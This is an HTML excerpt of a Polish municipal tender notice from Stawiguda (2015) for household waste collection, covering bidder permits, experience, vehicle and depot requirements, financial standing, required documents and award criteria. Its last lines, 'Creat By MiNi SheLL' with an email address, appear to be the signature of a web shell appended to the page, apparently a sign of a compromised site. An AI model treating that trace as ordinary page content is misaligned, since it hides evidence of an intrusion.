<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że posiada uprawnienia do wykonywania określanej działalności lub czynności,  jeżeli przepisy prawa nakładają obowiązek ich posiadania poprzez wykazanie: a) kserokopii zaświadczenia o wpisie do rejestru działalności regulowanej w zakresie odbierania odpadów komunalnych prowadzonego przez Wójta Gminy Stawiguda, b) aktualnego zezwolenia Starosty lub Prezydenta Miasta na prawach powiatu właściwego ze względu na miejsce siedziby lub zamieszkania transportującego odpady komunalne, w tym niebezpieczne odpady komunalne, c) aktualnego zezwolenia na prowadzenie działalności w zakresie składowania, odzysku lub unieszkodliwiania odpadów komunalnych lub gotowości przyjęcia odpadów komunalnych przez przedsiębiorcę prowadzącego działalność w zakresie składowania, odzysku lub unieszkodliwiania odpadów, objętych przedmiotem zamówienia. Miejsca składowania, odzysku lub unieszkodliwiania odpadów, o których mowa wyżej powinny spełniać warunki określone w ustawie z dnia 27 kwietnia 2001r. o odpadach (tj. Dz. U. 2013 poz. 21 z późn. zm.) oraz ustawie z dnia 13 września 1996r. o utrzymaniu czystości i porządku w gminach (tj. Dz. U. 2013 poz. 1399 z późn. zm.) Ocena warunku nastąpi na podstawie załączonego przez Wykonawcę do oferty: a) kserokopii zaświadczenia o wpisie do rejestru działalności regulowanej w zakresie odbierania odpadów komunalnych prowadzonego przez Wójta Gminy Stawiguda, b) aktualnego zezwolenia Starosty lub Prezydenta Miasta na prawach powiatu właściwego ze względu na miejsce siedziby lub zamieszkania transportującego odpady komunalne, w tym niebezpieczne odpady komunalne, c) aktualnego zezwolenia na prowadzenie działalności w zakresie składowania, odzysku lub unieszkodliwiania odpadów komunalnych lub gotowości przyjęcia odpadów komunalnych przez przedsiębiorcę prowadzącego działalność w zakresie składowania, odzysku lub unieszkodliwiania odpadów, objętych przedmiotem zamówienia. Miejsca składowania, odzysku lub unieszkodliwiania odpadów, o których mowa wyżej powinny spełniać warunki określone w ustawie z dnia 27 kwietnia 2001r. o odpadach (tj. Dz. U. 2013 poz. 21 z późn. zm.) oraz ustawie z dnia 13 września 1996r. o utrzymaniu czystości i porządku w gminach (tj. Dz. U. 2013 poz. 1399 z późn. zm.). Nie wykazanie w wystarczający sposób potwierdzenia spełnienia tego warunku spowoduje wykluczenie wykonawcy z postępowania po wyczerpaniu czynności wezwania do uzupełnienia dokumentów.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże że, wykonał w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy - w tym okresie, co najmniej dwie usługi odbioru odpadów i przekazania do odzysku lub unieszkodliwiania odpadów komunalnych wykonywaną w sposób ciągły przez okres łączny co najmniej 12 miesięcy wraz z załączeniem dowodów określających, czy zostały one wykonane  należycie. Zamawiający dopuszcza złożenie dowodu w postaci oświadczenia Wykonawcy w przypadku, gdy z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać poświadczenia. Ocena warunku nastąpi na podstawie załączonego przez Wykonawcę do oferty: wykazu wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych głównych usług w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów na rzecz których usługi zostały wykonane - załącznik nr 4. Zamawiający  korzysta z § 1 ust. 4 Rozporządzenie Prezesa Rady Ministrów z dnia 19 lutego 2013r. w sprawie rodzajów dokumentów potwierdzających spełnianie warunków udziału w postępowaniu o udzielenie zamówienia publicznego, jakich może żądać Zamawiający od Wykonawcy i określa usługi, których  dotyczy obowiązek wskazania przez Wykonawcę w wykazie i złożenia poświadczeń (z tym że w odniesieniu do nadal wykonywanych usług okresowych lub ciągłych poświadczenie powinno być wystawione nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert), że zostały wykonane lub są wykonywane należycie. Wykonawca wykaże że, wykonał w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy - w tym okresie, co najmniej dwie usługi odbioru i przekazania do odzysku lub unieszkodliwiania odpadów komunalnych wykonywaną w sposób ciągły przez okres co najmniej 12 miesięcy wraz z załączeniem dowodów określających, czy zostały one wykonane  należycie. Dla wykonawców zagranicznych wartość podana w obcej walucie zostanie przeliczona wg. średniego kursu walut banku NBP. Zamawiający dopuszcza złożenie dowodu w postaci oświadczenia Wykonawcy w przypadku, gdy z uzasadnionych przyczyn o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać poświadczenia. Nie wykazanie w wystarczający sposób potwierdzenia spełnienia tego warunku spowoduje wykluczenie wykonawcy z postępowania po wyczerpaniu czynności wezwania do uzupełnienia dokumentów.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że dysponuje potencjałem technicznym umożliwiającym odbieranie odpadów komunalnych od właścicieli nieruchomości (niezbędne do realizacji zamówienia) zgodnie z § 3, § 4 i § 5 Rozporządzeniem Ministra Środowiska z dnia 11 stycznia 2013 r. w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości (Dz. U. 2013 poz. 122). Wykonawca wykaże, że dysponuje: a) co najmniej dwoma pojazdami  przystosowanymi do odbierania zmieszanych odpadów komunalnych, b) co najmniej dwoma pojazdami przystosowanymi do odbierania selektywnie zebranych odpadów komunalnych, c) co najmniej jednym pojazdem do odbierania odpadów bez funkcji kompaktującej, d) urządzeniami do selektywnego gromadzenia odpadów komunalnych przed ich transportem do miejsc przetwarzania na terenie bazy magazynowo-transportowe. Wyposażenie pojazdów powinno obejmować: a) konstrukcję, która zabezpiecza przed rozwiewaniem i rozpylaniem przewożonych odpadów oraz minimalizowała oddziaływanie czynników atmosferycznych na odpady, b) system:- monitoringu bazującego na systemie pozycjonowania satelitarnego, umożliwiający trwałe zapisywanie, przechowywanie i odczytywanie danych o położeniu pojazdu i miejscach postojów, - czujników zapisujących dane o miejscach wyładunku odpadów umożliwiający weryfikację tych danych, c)pojazdy były wyposażone w narzędzia lub urządzenia umożliwiające sprzątanie terenu po opróżnieniu pojemników, d)	dopuszcza się wyposażenie pojazdów w urządzenie do ważenia odpadów komunalnych. Ocena warunku nastąpi na podstawie załączonych przez Wykonawcę do oferty: wykazu sprzętu zgodnego z Rozporządzeniem Ministra Środowiska z dnia 11 stycznia 2013r. w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości (Dz. U. 2013 poz. 122), który zawierał będzie: a) co najmniej dwoma pojazdami  przystosowanymi do odbierania zmieszanych odpadów komunalnych, b) co najmniej dwoma pojazdami przystosowanymi do odbierania selektywnie zebranych odpadów komunalnych, c)	co najmniej jednym pojazdem do odbierania odpadów bez funkcji kompaktującej, d) urządzeniami do selektywnego gromadzenia odpadów komunalnych przed ich transportem do miejsc przetwarzania na terenie bazy magazynowo-transportowej. Wyposażenie pojazdów powinno obejmować: a) konstrukcję, która zabezpiecza przed rozwiewaniem i rozpylaniem przewożonych odpadów oraz minimalizowała oddziaływanie czynników atmosferycznych na odpady, b) system: - monitoringu bazującego na systemie pozycjonowania satelitarnego, umożliwiający trwałe zapisywanie, przechowywanie i odczytywanie danych o położeniu pojazdu i miejscach postojów, - czujników zapisujących dane o miejscach wyładunku odpadów umożliwiający weryfikację tych danych, a) pojazdy były wyposażone w narzędzia lub urządzenia umożliwiające sprzątanie terenu po opróżnieniu pojemników, b)	dopuszcza się wyposażenie pojazdów w urządzenie do ważenia odpadów komunalnych. Wykaz sprzętu powinien zawierać informację o podstawie do dysponowania tymi zasobami - załącznik nr 6 oraz Wykonawca wykaże, że posiada: bazę magazynowo - transportową spełniającą warunki zgodnie z § 2 Rozporządzeniem Ministra Środowiska z dnia 11 stycznia 2013 r. w sprawie szczegółowych wymagań w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości (Dz. U. 2013 poz. 122) takie jak: 1. baza magazynowo-transportowa powinna być usytuowana w gminie, z której terenu odbierane są odpady, lub w odległości nie większej niż 60 km od granicy tej gminy, 2. baza magazynowo-transportowa powinna być zlokalizowana na terenie, do którego Wykonawca posiada tytuł prawny, a teren ten winien być zabezpieczony w sposób uniemożliwiający wstęp osobom nieupoważnionym, 3.	miejsca przeznaczone do parkowania pojazdów powinny być zabezpieczone przed emisją zanieczyszczeń do gruntu, 4. miejsca magazynowania selektywnie zebranych odpadów komunalnych powinny być zabezpieczone przed emisją zanieczyszczeń do gruntu oraz zabezpieczone przed działaniem czynników atmosferycznych, 5. teren bazy magazynowo-transportowej powinien być wyposażony w urządzenia lub systemy zapewniające zagospodarowanie wód opadowych i ścieków przemysłowych, pochodzących z terenu bazy zgodnie z wymaganiami określonymi przepisami ustawy z dnia 18 lipca 2001 r. - Prawo wodne (t.j Dz. U. 2012. poz. 145 z późn. zm.), 6. baza magazynowo-transportowa powinna być wyposażona w: a) miejsca przeznaczone do parkowania pojazdów, b) pomieszczenie socjalne dla pracowników odpowiadające liczbie zatrudnionych osób, c) miejsca do magazynowania selektywnie zebranych odpadów z grupy odpadów komunalnych, d) legalizowaną samochodową wagę najazdową - w przypadku gdy na terenie bazy następuje magazynowanie odpadów. 7. Na terenie bazy magazynowo-transportowej powinny znajdować się także: a)	punkt bieżącej konserwacji i napraw pojazdów, b) miejsce do mycia i dezynfekcji pojazdów - o ile czynności te nie są wykonywane przez uprawnione podmioty zewnętrzne poza terenem bazy magazynowo-transportowej. 8. Część transportowa oraz część magazynowa bazy mogą znajdować się na oddzielnych terenach, przy jednoczesnym spełnieniu warunków określonych w ust. 1-7. Ocena warunku nastąpi na podstawie złączonych przez Wykonawcę do oferty: Oświadczenia Wykonawcy o posiadaniu bazy magazynowo - transportowej oraz spełnieniu pozostałych warunków określonych w rozdziale VIII pkt. 2 ppkt.2.3 SWIZ - załącznik nr 9. Nie wykazanie w wystarczający sposób potwierdzenia spełnienia tego warunku spowoduje wykluczenie wykonawcy z postępowania po wyczerpaniu czynności wezwania do uzupełnienia dokumentów.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że: znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia tj. posiada środki finansowe lub mają zdolność kredytową na kwotę nie niższą niż: 100 000,00 zł. Ocena warunku nastąpi na podstawie złączonych przez Wykonawcę do oferty dokumentów: informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy na kwotę nie niższą niż: 100 000,00 zł, wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. Jeżeli z uzasadnionej przyczyny wykonawca nie może przedstawić dokumentów dotyczących sytuacji finansowej i ekonomicznej wymaganych przez zamawiającego, może przedstawić inny dokument, który w wystarczający sposób potwierdza spełnianie opisanego przez zamawiającego warunku. Jeżeli wykonawca wykazując spełnianie warunku, o którym mowa w art. 22 ust. 1 pkt 4 ustawy, polega na zdolnościach finansowych innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, wymaga się przedłożenia informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej dotyczącej tych podmiotów potwierdzający spełnienie warunku. Nie wykazanie w wystarczający sposób potwierdzenia spełnienia tego warunku spowoduje wykluczenie wykonawcy z postępowania po wyczerpaniu czynności wezwania do uzupełnienia dokumentów</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. formularz ofertowy z wykorzystaniem wzoru - załącznik nr 1  2. pełnomocnictwa osób podpisujących ofertę do podejmowania zobowiązań w imieniu firmy składającej ofertę, o ile nie wynikają z przepisów prawa lub innych dokumentów 3. kserokopia dowodu wniesienia wadium 4. oświadczenie o podwykonawcach - załącznik nr 8</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 96</li>
<li>2 - Emisja spalin pojazdów wg normy EURO 4 - 2</li>
<li>3 - Termin płatności - 2</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany treści umowy w przypadku: 1. ustawowej zmiany stawki podatku VAT, 2. zmiany osób i podmiotów uczestniczących w realizacji przedmiotu umowy, 3. zmiany podwykonawcy i podmiotu trzeciego (Wykonawca przedłoży Zamawiającemu dokumenty dotyczące podwykonawcy lub podmiotu trzeciego, który musi spełniać warunki określone w SIWZ) Zamawiający zaakceptuje lub odmówi zmiany podwykonawcy lub podmiotu trzeciego w ciągu 14 dni od dnia przedłożenia dokumentów, 4.	inne zmiany, których nie można było przewidzieć w chwili wyboru najkorzystniejszej oferty, które nie będą ingerować w przedmiot zamówienia, a ich wprowadzenie będzie niezbędne do należytego wykonania zamówienia, 5. W przypadku wystąpienia przyczyn ust. 1-2, 4 Strony uzgodnią powyższe zmiany zawartej umowy w formie aneksu. 6. W przypadku wystąpienia przyczyn, o których mowa w ust. 3 nie będzie konieczności zmiany umowy w formie aneksu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.stawiguda.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Na wniosek złożony do siedziby Zamawiającego na adres: Urząd Gminy Stawiguda ul. Olsztyńska 10, 11-034 Stawiguda.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.06.2015 godzina 11:45, miejsce: Urząd Gminy Stawiguda, ul. Olsztyńska 10, 11-034 Stawiguda, pokoju nr 18 - sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com